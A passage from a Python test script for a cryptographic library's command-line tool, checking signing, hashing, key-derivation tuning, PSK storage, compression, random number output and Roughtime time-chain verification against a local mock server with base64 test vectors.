test_cli("hash", ["--no-fsname", priv_key], "67929FAEC636E43DE828C1CD7E2D11CE7C3388CE90DD0A0F687C6627FFA850CD") test_cli("sign", [priv_key, msg, "--output=%s" % (sig2)], "") test_cli("verify", [pub_key, msg, sig2], "Signature is valid") test_cli("hash", ["--no-fsname", sig2], "0785A6AD54CC7D01F2BE2BC6463A3EAA1159792E52210ED754992C5068E8F24F") test_cli("hash", ["--no-fsname", priv_key], "1940945D68B1CF54D79E05DD7913A4D0B4959183F1E12B81A4E43EF4E63FBD20") # private key updates, public key is unchanged: test_cli("pkcs8", "--pub-out --output=%s %s" % (pub_key2, priv_key), "") test_cli("fingerprint", ['--no-fsname', pub_key2], "B0:F4:98:6E:D8:4E:05:63:A1:D8:4B:37:61:5A:A0:41:78:7E:DE:0E:72:46:E0:A8:D6:CF:09:54:08:DA:A4:22") def cli_pbkdf_tune_tests(_tmp_dir): if not check_for_command("pbkdf_tune"): return expected = re.compile(r'For (default|[1-9][0-9]*) ms selected Scrypt\([0-9]+,[0-9]+,[0-9]+\) using [0-9]+ MiB') output = test_cli("pbkdf_tune", ["--check", "1", "10", "50", "default"], None).split('\n') for line in output: if expected.match(line) is None: logging.error("Unexpected line '%s'" % (line)) expected_pbkdf2 = re.compile(r'For (default|[1-9][0-9]*) ms selected PBKDF2\(HMAC\(SHA-256\),[0-9]+\)') output = test_cli("pbkdf_tune", ["--algo=PBKDF2(SHA-256)", "--check", "1", "10", "50", "default"], None).split('\n') for line in output: if expected_pbkdf2.match(line) is None: logging.error("Unexpected line '%s'" % (line)) expected_argon2 = re.compile(r'For (default|[1-9][0-9]*) ms selected Argon2id\([0-9]+,[0-9]+,[0-9]+\)') output = test_cli("pbkdf_tune", ["--algo=Argon2id", "--check", "1", "10", "50", "default"], None).split('\n') for line in output: if expected_argon2.match(line) is None: logging.error("Unexpected line '%s'" % (line)) def cli_psk_db_tests(tmp_dir): if not check_for_command("psk_get"): return psk_db = os.path.join(tmp_dir, 'psk.db') db_key1 = "909"*32 db_key2 = "451"*32 test_cli("psk_set", [psk_db, db_key1, "name", "F00FEE"], "") test_cli("psk_set", [psk_db, db_key2, "name", "C00FEE11"], "") test_cli("psk_set", [psk_db, db_key1, "name2", "50051029"], "") test_cli("psk_get", [psk_db, db_key1, "name"], "F00FEE") test_cli("psk_get", [psk_db, db_key2, "name"], "C00FEE11") test_cli("psk_list", [psk_db, db_key1], "name\nname2") test_cli("psk_list", [psk_db, db_key2], "name") def cli_compress_tests(tmp_dir): if not check_for_command("compress"): return input_file = os.path.join(tmp_dir, 'input.txt') output_file = os.path.join(tmp_dir, 'input.txt.gz') with open(input_file, 'w') as f: f.write("hi there") f.close() test_cli("compress", input_file) if not os.access(output_file, os.R_OK): logging.error("Compression did not created expected output file") is_py3 = sys.version_info[0] == 3 output_hdr = open(output_file, 'rb').read(2) if is_py3: if output_hdr[0] != 0x1F or output_hdr[1] != 0x8B: logging.error("Did not see expected gzip header") else: if ord(output_hdr[0]) != 0x1F or ord(output_hdr[1]) != 0x8B: logging.error("Did not see expected gzip header") os.unlink(input_file) test_cli("decompress", output_file) if not os.access(input_file, os.R_OK): logging.error("Decompression did not created expected output file") recovered = open(input_file).read() if recovered != "hi there": logging.error("Decompression did not recover original input") def cli_rng_tests(_tmp_dir): test_cli("rng", "10", "D80F88F6ADBE65ACB10C") test_cli("rng", "16", "D80F88F6ADBE65ACB10C3602E67D985B") test_cli("rng", "10 6", "D80F88F6ADBE65ACB10C\n1B119CC068AF") test_cli("rng", ['--format=base64', '10'], "2A+I9q2+ZayxDA==") test_cli("rng", ['--format=base58', '10'], "D93XRyVfxqs7oR") test_cli("rng", ['--format=base58check', '10'], "2NS1jYUq92TyGFVnhVLa") hex_10 = re.compile('[A-F0-9]{20}') for rng in ['system', 'auto', 'entropy']: output = test_cli("rng", ["10", '--%s' % (rng)], use_drbg=False) if output == "D80F88F6ADBE65ACB10C": logging.error('RNG produced DRBG output') if hex_10.match(output) is None: logging.error('Unexpected RNG output %s' % (output)) has_rdrand = test_cli("cpuid", []).find(' rdrand ') > 0 if has_rdrand: output = test_cli("rng", ["10", '--rdrand'], use_drbg=False) if output == "D80F88F6ADBE65ACB10C": logging.error('RDRAND produced DRBG output') if hex_10.match(output) is None: logging.error('Unexpected RNG output %s' % (output)) def cli_roughtime_check_tests(tmp_dir): # pylint: disable=line-too-long if not check_for_command("roughtime_check"): return chain = os.path.join(tmp_dir, 'roughtime-chain') with open(chain, 'w') as f: f.write("""\ ed25519 bbT+RPS7zKX6w71ssPibzmwWqU9ffRV5oj2OresSmhE= eu9yhsJfVfguVSqGZdE8WKIxaBBM0ZG3Vmuc+IyZmG2YVmrIktUByDdwIFw6F4rZqmSFsBO85ljoVPz5bVPCOw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWBnGOEajOwPA6G7oL47seBP4C7eEpr57H43C2/fK/kMA0UGZVUdf4KNX8oxOK6JIcsbVk8qhghTwA70qtwpYmQkDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AJrA8tEqPBQAqisiuAxgy2Pj7UJAiWbCdzGz1xcCnja3T+AqhC8fwpeIwW4GPy/vEb/awXW2DgSLKJfzWIAz+2lsR7t4UjNPvAgAAAEAAAABTSUcAREVMRes9Ch4X0HIw5KdOTB8xK4VDFSJBD/G9t7Et/CU7UW61OiTBXYYQTG2JekWZmGa0OHX1JPGG+APkpbsNw0BKUgYDAAAAIAAAACgAAABQVUJLTUlOVE1BWFR/9BWjpsWTQ1f6iUJea3EfZ1MkX3ftJiV3ABqNLpncFwAAAAAAAAAA//////////8AAAAA ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= uLeTON9D+2HqJMzK6sYWLNDEdtBl9t/9yw1cVAOm0/sONH5Oqdq9dVPkC9syjuWbglCiCPVF+FbOtcxCkrgMmA== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWOw1jl0uSiBEH9HE8/6r7zxoSc01f48vw+UzH8+VJoPelnvVJBj4lnH8uRLh5Aw0i4Du7XM1dp2u0r/I5PzhMQoDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AUBo+tEqPBQC47l77to7ESFTVhlw1SC74P5ssx6gpuJ6eP+1916GuUiySGE/x3Fp0c3otUGAdsRQou5p9PDTeane/YEeVq4/8AgAAAEAAAABTSUcAREVMRe5T1ml8wHyWAcEtHP/U5Rg/jFXTEXOSglngSa4aI/CECVdy4ZNWeP6vv+2//ZW7lQsrWo7ZkXpvm9BdBONRSQIDAAAAIAAAACgAAABQVUJLTUlOVE1BWFQpXlenV0OfVisvp9jDHXLw8vymZVK9Pgw9k6Edf8ZEhUgSGEc5jwUASHLvZE2PBQAAAAAA ed25519 etPaaIxcBMY1oUeGpwvPMCJMwlRVNxv51KK/tktoJTQ= U53wX99JzZwy4BXa9C6R04bPu4yqFB5w5/wTgG8Mw5wm+VLrY70ECxJ9ZHnpdHVHaLEU3aeLnQFZyZPRAEOCyw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWMh3mPWCCbOlX8xDWbU9qdfKoReJX/XLsivom8bJJYmcC7T03tyXrtWUheEJweHtg4qMgSyifQS1MjHJSy1jPAsDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8Akxw/tEqPBQBfOsOuciR7jiAW5itQ39y8yVr/ZJmgMwvTjqaU4/wA05ZqG4RqoLdvDXh5bCNySL6LrrnBNSAHwn5COt0CItNuAgAAAEAAAABTSUcAREVMRVP3BIOzsZmuxqMi+ScIBPyKtzFfK7ZlPFNP0JrNwln2QYtAcQFIKywDdNAAL+n8i3dz1p99K50FJjCkCl2J6AMDAAAAIAAAACgAAABQVUJLTUlOVE1BWFQKC/kZVdjiNT2NCSGfnpot4eqipyMFsyMjiIQmqqqXqQCAa245jwUAAGCgA56PBQAAAAAA ed25519 AW5uAoTSTDfG5NfY1bTh08GUnOqlRb+HVhbJ3ODJvsE= IcZcXFuaLKYYhWcK3sT/6PrVeXMmabCRbf9hvVfkMkqEW1PFL++ZnHJ1/m+G8azITxvktwsfP1YAOOxWdbf9XQ== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWL5DAl8GPNUQ/mSXl0tI4N9yZAO+PiXTodJOTDL+WU/x26iqgyyQRikSSocRMzAEVLDGasdyW19mVC6H/6vfXggDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8Av/JAtEqPBQBIP346SHhCdDfughzeH+uYSbxngDYxqHzBDtZt0obUKrzxfRWzD1oR61B1reLvoPVCKSfzEngi/g1NSQjTrzNMAgAAAEAAAABTSUcAREVMRTQLLplQv0rN4p77Bo59qT8bbquV6MKSwILI/Tw2LLGo9noaZegUFmM+rNu1d1AVOEVQ01j6/2xDmBvp0d6MZgEDAAAAIAAAACgAAABQVUJLTUlOVE1BWFS4a1dYoIB5u/zkbR3sIteuhVrQkszzj+Gng9ywo6O9VgAAAAAAAAAA//////////8AAAAA ed25519 cj8GsiNlRkqiDElAeNMSBBMwrAl15hYPgX50+GWX/lA= Tsy82BBU2xxVqNe1ip11OyEGoKWhKoSggWjBmDTSBmKbTs7bPPCEidYc5TQ23sQUWe62G35fQOVU28q+Eq5uhQ== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDAmi7zgXAqLgQXVfbjeqnUZRiXCZI64QIoAKFL83CQHbyXgB4cNwHfQ9mSg0hYxTp1M8QxOuzusnUpk05DIRwwDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AcOBCtEqPBQBhsr1mKOxxCf4VDFzAtYB4Nhs332AN1LrJU/8+VqktzfPd2R7awJHEVEWugvSvOrr+9d332mQObAkYfKfDtbSFAgAAAEAAAABTSUcAREVMRUjnhDvkIjFzTEYtgHOfMpRHtnNZj4P31RFtapkwzGjOtc93pYDd7zqQCw2AVcfbSnPqa8k26z96Q9fVRzq0pw8DAAAAIAAAACgAAABQVUJLTUlOVE1BWFR7qp2oerjpbN8Y23nUGARIlsgkodW4owH29ZKhxDMn8AAAAAAAAAAA//////////8AAAAA """) test_cli("roughtime_check", chain, """\ 1: UTC 2019-08-04T13:38:17 (+-1000000us) 2: UTC 2019-08-04T13:38:17 (+-1000000us) 3: UTC 2019-08-04T13:38:17 (+-1000000us) 4: UTC 2019-08-04T13:38:18 (+-1000000us) 5: UTC 2019-08-04T13:38:18 (+-1000000us)""") with open(chain, 'w') as f: f.write("ed25519 bbT+RPS7zKX6w71ssPibzmwWqU9ffRV5oj2OresSmhE= eu9yhsJfVfguVSqGZdE8WKIxaBBM0ZG3Vmuc+IyZmG2YVmrIktUByDdwIFw6F4rZqmSFsBO85ljoVPz5bVPCOw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWBnGOEajOwPA6G7oL47seBP4C7eEpr57H43C2/fK/kMA0UGZVUdf4KNX8oxOK6JIcsbVk8qhghTwA70qtwpYmQkDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AJrA8tEqPBQAqisiuAxgy2Pj7UJAiWbCdzGz1xcCnja3T+AqhC8fwpeIwW4GPy/vEb/awXW2DgSLKJfzWIAz+2lsR7t4UjNPvAgAAAEAAAABTSUcAREVMRes9Ch4X0HIw5KdOTB8xK4VDFSJBD/G9t7Et/CU7UW61OiTBXYYQTG2JekWZmGa0OHX1JPGG+APkpbsNw0BKUgYDAAAAIAAAACgAAABQVUJLTUlOVE1BWFR/9BWjpsWTQ1f6iUJea3EfZ1MkX3ftJiV3ABqNLpncFwAAAAAAAAAA//////////8AAAAA") test_cli("roughtime_check", [chain, "--raw-time"], "1: UTC 1564925897781286 (+-1000000us)") with open(chain, 'w') as f: f.write("ed25519 cbT+RPS7zKX6w71ssPibzmwWqU9ffRV5oj2OresSmhE= eu9yhsJfVfguVSqGZdE8WKIxaBBM0ZG3Vmuc+IyZmG2YVmrIktUByDdwIFw6F4rZqmSFsBO85ljoVPz5bVPCOw== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWBnGOEajOwPA6G7oL47seBP4C7eEpr57H43C2/fK/kMA0UGZVUdf4KNX8oxOK6JIcsbVk8qhghTwA70qtwpYmQkDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AJrA8tEqPBQAqisiuAxgy2Pj7UJAiWbCdzGz1xcCnja3T+AqhC8fwpeIwW4GPy/vEb/awXW2DgSLKJfzWIAz+2lsR7t4UjNPvAgAAAEAAAABTSUcAREVMRes9Ch4X0HIw5KdOTB8xK4VDFSJBD/G9t7Et/CU7UW61OiTBXYYQTG2JekWZmGa0OHX1JPGG+APkpbsNw0BKUgYDAAAAIAAAACgAAABQVUJLTUlOVE1BWFR/9BWjpsWTQ1f6iUJea3EfZ1MkX3ftJiV3ABqNLpncFwAAAAAAAAAA//////////8AAAAA") test_cli("roughtime_check", chain, expected_stderr=b'Error: Roughtime Invalid signature or public key\n') def cli_roughtime_tests(tmp_dir): # pylint: disable=line-too-long # pylint: disable=too-many-locals import socket import base64 import threading if not check_for_command("roughtime"): return server_port = random_port_number() chain_file = os.path.join(tmp_dir, 'roughtime-chain') ecosystem = os.path.join(tmp_dir, 'ecosystem') def run_udp_server(): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) server_address = ('127.0.0.1', server_port) sock.bind(server_address) while True: data, address = sock.recvfrom(4096) if data: if data != base64.b64decode(server_request): logging.error("unexpected request") sock.sendto(base64.b64decode(server_response), address) udp_thread = threading.Thread(target=run_udp_server) udp_thread.daemon = True udp_thread.start() chain = [ """\ ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDwlo/AkUnTrecAW4Ci5Tkh3KOqs6R7KLTsFtq16RXN5F7G5ckGv11UtzHoZTbKbEk03a6ogAOK54Q2CI/7XGA8DAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AWDLihlaSBQAoq/5gEjRCrhfH16X2GYjQJSG/CgSuGhYeCsrw7XkphLI3cxw2unJRDW8DAJrYqEGaW0NPKZk7bbpPjU/Q6Es1AgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA """, """\ ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDwlo/AkUnTrecAW4Ci5Tkh3KOqs6R7KLTsFtq16RXN5F7G5ckGv11UtzHoZTbKbEk03a6ogAOK54Q2CI/7XGA8DAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AWDLihlaSBQAoq/5gEjRCrhfH16X2GYjQJSG/CgSuGhYeCsrw7XkphLI3cxw2unJRDW8DAJrYqEGaW0NPKZk7bbpPjU/Q6Es1AgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWHH5Ofs4HciIFXjE9egjDbistJptoMXIC7ugCgHhI4NPJqfYY256NpULXKc9c30ul7oHXQyKLfGd84mIAxC3UwQDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AuOoUh1aSBQANeC4gGGG3a23PpmF+y6CrUS9VWjyj0Ydpl2tMVDLaK2vd5QtYKKJ3UOyprGKk0D/aPn4E3Bk2rE3BKBZRXM1AAgAAAEAAAABTSUcAREVMRci9uvioJssgd8txxFlqz9RqPx+YLVMkHmm24fMUtYGWF/nhkoEYVGT7O+tXSfHHY/KHcUZjVaZpEt/tmXlXBAUDAAAAIAAAACgAAABQVUJLTUlOVE1BWFSxhKhavdriTvCAtNVcK5yr0cAbsWp2MsrwUV5YTc+7V0CsaLZSkgUAQAxA1GaSBQAAAAAA """, """\ ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= SbWKPilWYrt+1vgFU3jlxGNOH6I/1npX8wl+KoraN3S6VDsyM6EfCV+JPEK8BsNoM2VIpMcSdjcVna/GwXwZkg== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWHH5Ofs4HciIFXjE9egjDbistJptoMXIC7ugCgHhI4NPJqfYY256NpULXKc9c30ul7oHXQyKLfGd84mIAxC3UwQDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AuOoUh1aSBQANeC4gGGG3a23PpmF+y6CrUS9VWjyj0Ydpl2tMVDLaK2vd5QtYKKJ3UOyprGKk0D/aPn4E3Bk2rE3BKBZRXM1AAgAAAEAAAABTSUcAREVMRci9uvioJssgd8txxFlqz9RqPx+YLVMkHmm24fMUtYGWF/nhkoEYVGT7O+tXSfHHY/KHcUZjVaZpEt/tmXlXBAUDAAAAIAAAACgAAABQVUJLTUlOVE1BWFSxhKhavdriTvCAtNVcK5yr0cAbsWp2MsrwUV5YTc+7V0CsaLZSkgUAQAxA1GaSBQAAAAAA ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= 2A+I9q2+ZayxDDYC5n2YW8Bn/zBm4D3mwS5qMwADRDcbFpBcf3yPOyeZiqpLBTkxo8GT8zMQFeApv4ScffjC8A== BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWN5Y0b2irPS1JgqJFQMciPg4aWd9qj1ZqcJc5bGXe1m4ZdAXa5OIhXa0+680MgpyhEHhqYJDIwH1XRa1OZx5YAUDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AgBW3iFaSBQD9WI+Qr6NOZsDmP0PsnCo66mstM3ac5ZON+I+ZeEK8lZWBASvsD2JIfq3v4d1QH5g4STs3wOazQPc25Puy659ZAgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA """, ] request = [ "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", ] response = [ "BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWDwlo/AkUnTrecAW4Ci5Tkh3KOqs6R7KLTsFtq16RXN5F7G5ckGv11UtzHoZTbKbEk03a6ogAOK54Q2CI/7XGA8DAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AWDLihlaSBQAoq/5gEjRCrhfH16X2GYjQJSG/CgSuGhYeCsrw7XkphLI3cxw2unJRDW8DAJrYqEGaW0NPKZk7bbpPjU/Q6Es1AgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA", "BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWHH5Ofs4HciIFXjE9egjDbistJptoMXIC7ugCgHhI4NPJqfYY256NpULXKc9c30ul7oHXQyKLfGd84mIAxC3UwQDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AuOoUh1aSBQANeC4gGGG3a23PpmF+y6CrUS9VWjyj0Ydpl2tMVDLaK2vd5QtYKKJ3UOyprGKk0D/aPn4E3Bk2rE3BKBZRXM1AAgAAAEAAAABTSUcAREVMRci9uvioJssgd8txxFlqz9RqPx+YLVMkHmm24fMUtYGWF/nhkoEYVGT7O+tXSfHHY/KHcUZjVaZpEt/tmXlXBAUDAAAAIAAAACgAAABQVUJLTUlOVE1BWFSxhKhavdriTvCAtNVcK5yr0cAbsWp2MsrwUV5YTc+7V0CsaLZSkgUAQAxA1GaSBQAAAAAA", 